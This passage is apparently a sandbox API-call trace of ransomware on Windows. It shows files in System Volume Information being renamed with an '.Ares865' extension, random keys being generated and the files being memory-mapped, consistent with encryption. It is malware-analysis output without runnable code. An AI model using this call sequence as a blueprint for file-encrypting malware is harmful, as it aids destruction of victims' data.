information\\spp\\sppgroupcache\\{c861246c-5d84-4ff4-a753-bad4631d65ca}_windowsupdateinfo.ares865"), dwFlags=0x1) returned 1 [0113.163] CreateFileW (lpFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{C861246C-5D84-4FF4-A753-BAD4631D65CA}_WindowsUpdateInfo.Ares865" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{c861246c-5d84-4ff4-a753-bad4631d65ca}_windowsupdateinfo.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0113.163] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=264) returned 1 [0113.163] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0113.164] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0113.164] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0113.164] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x410, lpName=0x0) returned 0x170 [0113.166] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x410) returned 0x190000 [0113.166] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0113.167] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0113.167] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0113.168] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\System Volume Information\\SPP\\SppGroupCache\\{CB7F5435-7D84-4F72-A889-A21E062F0CB6}_DriverPackageInfo.Ares865") returned 111 [0113.168] MoveFileExW (lpExistingFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{CB7F5435-7D84-4F72-A889-A21E062F0CB6}_DriverPackageInfo" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{cb7f5435-7d84-4f72-a889-a21e062f0cb6}_driverpackageinfo"), lpNewFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{CB7F5435-7D84-4F72-A889-A21E062F0CB6}_DriverPackageInfo.Ares865" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{cb7f5435-7d84-4f72-a889-a21e062f0cb6}_driverpackageinfo.ares865"), dwFlags=0x1) returned 1 [0113.169] CreateFileW (lpFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{CB7F5435-7D84-4F72-A889-A21E062F0CB6}_DriverPackageInfo.Ares865" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{cb7f5435-7d84-4f72-a889-a21e062f0cb6}_driverpackageinfo.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0113.169] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=56376) returned 1 [0113.170] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0113.170] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0113.170] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0113.171] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xdf40, lpName=0x0) returned 0x170 [0113.172] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xdf40) returned 0x190000 [0113.177] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0113.178] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0113.178] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0113.179] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\System Volume Information\\SPP\\SppGroupCache\\{CB7F5435-7D84-4F72-A889-A21E062F0CB6}_WindowsUpdateInfo.Ares865") returned 111 [0113.179] MoveFileExW (lpExistingFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{CB7F5435-7D84-4F72-A889-A21E062F0CB6}_WindowsUpdateInfo" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{cb7f5435-7d84-4f72-a889-a21e062f0cb6}_windowsupdateinfo"), lpNewFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{CB7F5435-7D84-4F72-A889-A21E062F0CB6}_WindowsUpdateInfo.Ares865" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{cb7f5435-7d84-4f72-a889-a21e062f0cb6}_windowsupdateinfo.ares865"), dwFlags=0x1) returned 1 [0113.180] CreateFileW (lpFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{CB7F5435-7D84-4F72-A889-A21E062F0CB6}_WindowsUpdateInfo.Ares865" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{cb7f5435-7d84-4f72-a889-a21e062f0cb6}_windowsupdateinfo.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0113.180] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=432) returned 1 [0113.180] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0113.181] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0113.181] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0113.181] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4b0, lpName=0x0) returned 0x170 [0113.183] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4b0) returned 0x190000 [0113.184] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0113.185] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0113.185] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0113.185] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\System Volume Information\\SPP\\SppGroupCache\\{DBAB67DA-647A-401E-A02B-58C06249C638}_DriverPackageInfo.Ares865") returned 111 [0113.185] MoveFileExW (lpExistingFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{DBAB67DA-647A-401E-A02B-58C06249C638}_DriverPackageInfo" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{dbab67da-647a-401e-a02b-58c06249c638}_driverpackageinfo"), lpNewFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{DBAB67DA-647A-401E-A02B-58C06249C638}_DriverPackageInfo.Ares865" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{dbab67da-647a-401e-a02b-58c06249c638}_driverpackageinfo.ares865"), dwFlags=0x1) returned 1 [0113.186] CreateFileW (lpFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{DBAB67DA-647A-401E-A02B-58C06249C638}_DriverPackageInfo.Ares865" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{dbab67da-647a-401e-a02b-58c06249c638}_driverpackageinfo.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0113.186] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=56376) returned 1 [0113.187] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0113.187] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0113.187] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0113.187] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xdf40, lpName=0x0) returned 0x170 [0113.190] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xdf40) returned 0x190000 [0113.193] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0113.194] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0113.194] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0113.195] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\System Volume Information\\SPP\\SppGroupCache\\{DBAB67DA-647A-401E-A02B-58C06249C638}_WindowsUpdateInfo.Ares865") returned 111 [0113.195] MoveFileExW (lpExistingFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{DBAB67DA-647A-401E-A02B-58C06249C638}_WindowsUpdateInfo" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{dbab67da-647a-401e-a02b-58c06249c638}_windowsupdateinfo"), lpNewFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{DBAB67DA-647A-401E-A02B-58C06249C638}_WindowsUpdateInfo.Ares865" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{dbab67da-647a-401e-a02b-58c06249c638}_windowsupdateinfo.ares865"), dwFlags=0x1) returned 1 [0113.196] CreateFileW (lpFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{DBAB67DA-647A-401E-A02B-58C06249C638}_WindowsUpdateInfo.Ares865" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{dbab67da-647a-401e-a02b-58c06249c638}_windowsupdateinfo.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0113.197] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=432) returned 1 [0113.197] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0113.198] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0113.198] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0113.198] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4b0, lpName=0x0) returned 0x170 [0113.202] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4b0) returned 0x190000 [0113.203] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0113.203] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0113.203] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0113.204] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\System Volume Information\\SPP\\SppGroupCache\\{EE224D27-954D-4040-87C6-066B5517487C}_DriverPackageInfo.Ares865") returned 111 [0113.204] MoveFileExW (lpExistingFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{EE224D27-954D-4040-87C6-066B5517487C}_DriverPackageInfo" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{ee224d27-954d-4040-87c6-066b5517487c}_driverpackageinfo"), lpNewFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{EE224D27-954D-4040-87C6-066B5517487C}_DriverPackageInfo.Ares865" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{ee224d27-954d-4040-87c6-066b5517487c}_driverpackageinfo.ares865"), dwFlags=0x1) returned 1 [0113.207] CreateFileW (lpFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{EE224D27-954D-4040-87C6-066B5517487C}_DriverPackageInfo.Ares865" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{ee224d27-954d-4040-87c6-066b5517487c}_driverpackageinfo.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0113.207] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=56376) returned 1 [0113.207] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0113.208] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0113.208] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0113.208] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xdf40, lpName=0x0) returned 0x170 [0113.210] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xdf40) returned 0x190000 [0113.217] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0113.218] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0113.218] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0113.219] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\System Volume Information\\SPP\\SppGroupCache\\{EE224D27-954D-4040-87C6-066B5517487C}_WindowsUpdateInfo.Ares865") returned 111 [0113.219] MoveFileExW (lpExistingFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{EE224D27-954D-4040-87C6-066B5517487C}_WindowsUpdateInfo" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{ee224d27-954d-4040-87c6-066b5517487c}_windowsupdateinfo"), lpNewFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{EE224D27-954D-4040-87C6-066B5517487C}_WindowsUpdateInfo.Ares865" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{ee224d27-954d-4040-87c6-066b5517487c}_windowsupdateinfo.ares865"), dwFlags=0x1) returned 1 [0113.220] CreateFileW (lpFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{EE224D27-954D-4040-87C6-066B5517487C}_WindowsUpdateInfo.Ares865" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{ee224d27-954d-4040-87c6-066b5517487c}_windowsupdateinfo.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0113.221] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=264) returned 1 [0113.221] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0113.221] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0113.222] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0113.222] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x410, lpName=0x0) returned 0x170 [0113.225] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x410) returned 0x190000 [0113.226] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0113.226] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0113.226] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0113.227] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\System Volume Information\\SPP\\OnlineMetadataCache\\{00c95144-e912-40b3-a2d1-b8e12bc815d0}_OnDiskSnapshotProp.Ares865") returned 118 [0113.227] MoveFileExW (lpExistingFileName="C:\\System Volume Information\\SPP\\OnlineMetadataCache\\{00c95144-e912-40b3-a2d1-b8e12bc815d0}_OnDiskSnapshotProp" (normalized: "c:\\system volume information\\spp\\onlinemetadatacache\\{00c95144-e912-40b3-a2d1-b8e12bc815d0}_ondisksnapshotprop"), lpNewFileName="C:\\System Volume Information\\SPP\\OnlineMetadataCache\\{00c95144-e912-40b3-a2d1-b8e12bc815d0}_OnDiskSnapshotProp.Ares865" (normalized: "c:\\system volume information\\spp\\onlinemetadatacache\\{00c95144-e912-40b3-a2d1-b8e12bc815d0}_ondisksnapshotprop.ares865"), dwFlags=0x1) returned 1 [0113.229] CreateFileW (lpFileName="C:\\System Volume Information\\SPP\\OnlineMetadataCache\\{00c95144-e912-40b3-a2d1-b8e12bc815d0}_OnDiskSnapshotProp.Ares865" (normalized: "c:\\system volume information\\spp\\onlinemetadatacache\\{00c95144-e912-40b3-a2d1-b8e12bc815d0}_ondisksnapshotprop.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0113.229] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2456) returned 1 [0113.229] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0113.230] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0113.230] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0113.230] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xca0, lpName=0x0) returned 0x170 [0113.232] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xca0) returned 0x190000 [0113.235] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0113.235] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0113.235] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0113.236] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\System Volume Information\\SPP\\OnlineMetadataCache\\{1ce95dd8-c40b-44fd-a9e6-d72d44ed8f39}_OnDiskSnapshotProp.Ares865") returned 118 [0113.236] MoveFileExW (lpExistingFileName="C:\\System Volume Information\\SPP\\OnlineMetadataCache\\{1ce95dd8-c40b-44fd-a9e6-d72d44ed8f39}_OnDiskSnapshotProp" (normalized: "c:\\system volume information\\spp\\onlinemetadatacache\\{1ce95dd8-c40b-44fd-a9e6-d72d44ed8f39}_ondisksnapshotprop"), lpNewFileName="C:\\System Volume Information\\SPP\\OnlineMetadataCache\\{1ce95dd8-c40b-44fd-a9e6-d72d44ed8f39}_OnDiskSnapshotProp.Ares865" (normalized: "c:\\system volume information\\spp\\onlinemetadatacache\\{1ce95dd8-c40b-44fd-a9e6-d72d44ed8f39}_ondisksnapshotprop.ares865"), dwFlags=0x1) returned 1 [0113.237] CreateFileW (lpFileName="C:\\System Volume Information\\SPP\\OnlineMetadataCache\\{1ce95dd8-c40b-44fd-a9e6-d72d44ed8f39}_OnDiskSnapshotProp.Ares865" (normalized: "c:\\system volume information\\spp\\onlinemetadatacache\\{1ce95dd8-c40b-44fd-a9e6-d72d44ed8f39}_ondisksnapshotprop.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0113.238] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2288) returned 1 [0113.238] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0113.239] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0113.239] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0113.239] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xbf0, lpName=0x0) returned 0x170 [0113.241] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xbf0) returned 0x190000 [0113.243] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0113.244] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0113.244] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0113.245] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\System Volume Information\\SPP\\OnlineMetadataCache\\{1e9425cc-553b-418f-b0c6-ad1ac9e1ba0c}_OnDiskSnapshotProp.Ares865") returned 118 [0113.245] MoveFileExW (lpExistingFileName="C:\\System Volume Information\\SPP\\OnlineMetadataCache\\{1e9425cc-553b-418f-b0c6-ad1ac9e1ba0c}_OnDiskSnapshotProp" (normalized: "c:\\system volume information\\spp\\onlinemetadatacache\\{1e9425cc-553b-418f-b0c6-ad1ac9e1ba0c}_ondisksnapshotprop"), lpNewFileName="C:\\System Volume Information\\SPP\\OnlineMetadataCache\\{1e9425cc-553b-418f-b0c6-ad1ac9e1ba0c}_OnDiskSnapshotProp.Ares865" (normalized: "c:\\system volume information\\spp\\onlinemetadatacache\\{1e9425cc-553b-418f-b0c6-ad1ac9e1ba0c}_ondisksnapshotprop.ares865"), dwFlags=0x1) returned 1 [0113.246] CreateFileW (lpFileName="C:\\System Volume Information\\SPP\\OnlineMetadataCache\\{1e9425cc-553b-418f-b0c6-ad1ac9e1ba0c}_OnDiskSnapshotProp.Ares865" (normalized: "c:\\system volume information\\spp\\onlinemetadatacache\\{1e9425cc-553b-418f-b0c6-ad1ac9e1ba0c}_ondisksnapshotprop.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0113.246] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3440) returned 1 [0113.246] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0113.247] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0113.247] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0113.247] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1070, lpName=0x0) returned 0x170 [0113.249] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1070) returned 0x190000 [0113.250] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0113.252] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0113.252] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0113.252] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\System Volume Information\\SPP\\OnlineMetadataCache\\{29088c66-de5f-456f-85c0-6e4156f94358}_OnDiskSnapshotProp.Ares865") returned 118 [0113.252] MoveFileExW (lpExistingFileName="C:\\System Volume Information\\SPP\\OnlineMetadataCache\\{29088c66-de5f-456f-85c0-6e4156f94358}_OnDiskSnapshotProp" (normalized: "c:\\system volume information\\spp\\onlinemetadatacache\\{29088c66-de5f-456f-85c0-6e4156f94358}_ondisksnapshotprop"), lpNewFileName="C:\\System Volume Information\\SPP\\OnlineMetadataCache\\{29088c66-de5f-456f-85c0-6e4156f94358}_OnDiskSnapshotProp.Ares865" (normalized: "c:\\system volume information\\spp\\onlinemetadatacache\\{29088c66-de5f-456f-85c0-6e4156f94358}_ondisksnapshotprop.ares865"), dwFlags=0x1) returned 1 [0113.255] CreateFileW (lpFileName="C:\\System Volume Information\\SPP\\OnlineMetadataCache\\{29088c66-de5f-456f-85c0-6e4156f94358}_OnDiskSnapshotProp.Ares865" (normalized: "c:\\system volume information\\spp\\onlinemetadatacache\\{29088c66-de5f-456f-85c0-6e4156f94358}_ondisksnapshotprop.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0113.255] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3296) returned 1 [0113.255] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0113.256] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0113.256] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0113.256] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xfe0, lpName=0x0) returned 0x170 [0113.258] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xfe0) returned 0x190000 [0113.259] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: 